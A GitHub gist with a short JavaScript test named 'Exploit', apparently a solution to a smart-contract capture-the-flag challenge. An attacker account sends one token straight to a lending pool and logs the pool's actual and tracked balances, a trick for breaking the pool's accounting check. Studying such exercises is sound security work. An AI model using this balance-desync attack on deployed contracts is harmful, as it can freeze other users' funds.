Skip to content

Instantly share code, notes, and snippets.

@JuanXavier
Last active July 9, 2022 00:15
Show Gist options
  • Select an option

  • Save JuanXavier/b1cf636be734f34b70cfd0085d33504d to your computer and use it in GitHub Desktop.

Select an option

Save JuanXavier/b1cf636be734f34b70cfd0085d33504d to your computer and use it in GitHub Desktop.
it('Exploit', async function () {
await this.token.connect(attacker).transfer(this.pool.address, 1)
console.log(' POOL BALANCE', String(await this.token.balanceOf(this.pool.address)))
console.log('BALANCE BEFORE', String(await this.pool.poolBalance()))
})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment